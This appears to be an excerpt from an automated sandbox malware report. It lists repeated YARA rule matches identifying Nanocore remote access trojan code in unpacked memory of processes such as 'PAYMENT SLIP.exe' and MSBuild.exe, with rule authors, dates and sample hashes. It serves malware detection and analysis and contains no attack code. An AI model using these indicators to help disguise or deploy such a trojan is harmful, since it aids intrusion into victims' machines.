        Source: 12.2.MSBuild.exe.48632ce.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.450c0f1.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.450c0f1.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.17d0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.17d0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.MSBuild.exe.2f33c74.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.MSBuild.exe.2f33c74.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.46658d0.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.46658d0.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.PAYMENT SLIP.exe.2400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.PAYMENT SLIP.exe.2400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.PAYMENT SLIP.exe.2400000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.184e8a4.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.184e8a4.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.1840000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.1840000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.3524cf0.18.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.3524cf0.18.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.17f0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.17f0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.46574b4.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.46574b4.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.48f4f11.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.48f4f11.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.17e0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.17e0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.48f0272.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.48f0272.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.34b12fc.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.34b12fc.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.1810000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.1810000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.1430000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.1430000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.1870000.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.1870000.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 20.2.PAYMENT SLIP.exe.3050000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.2.PAYMENT SLIP.exe.3050000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 20.2.PAYMENT SLIP.exe.3050000.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.4507ac8.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.4507ac8.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.1450000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.1450000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.5810000.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.5810000.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.48e703e.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.48e703e.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 10.2.PAYMENT SLIP.exe.24e0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 10.2.PAYMENT SLIP.exe.24e0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 10.2.PAYMENT SLIP.exe.24e0000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.1420000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.1420000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 19.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 19.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.17f0000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.17f0000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.hmhrpib.exe.2f30000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.hmhrpib.exe.2f30000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.hmhrpib.exe.2f30000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.1830000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.1830000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.1420000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.1420000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.1840000.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.1840000.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 19.2.MSBuild.exe.40feae4.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.MSBuild.exe.40feae4.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.MSBuild.exe.3f5eae4.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.MSBuild.exe.3f5eae4.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 6.2.PAYMENT SLIP.exe.3160000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.PAYMENT SLIP.exe.3160000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 6.2.PAYMENT SLIP.exe.3160000.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 20.2.PAYMENT SLIP.exe.3050000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.2.PAYMENT SLIP.exe.3050000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 20.2.PAYMENT SLIP.exe.3050000.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
